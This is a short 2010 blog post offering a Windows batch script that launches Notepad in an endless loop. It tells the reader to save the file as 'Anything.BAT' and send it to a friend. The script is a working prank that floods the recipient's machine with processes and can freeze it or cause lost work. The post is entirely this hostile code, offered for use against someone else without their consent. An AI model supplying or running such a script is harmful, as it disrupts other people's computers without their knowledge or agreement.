Wednesday, September 1, 2010

Open Notepad continually in your friend's computer:

Type :

Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



Save it as "Anything.BAT" and send it.

No comments:

Post a Comment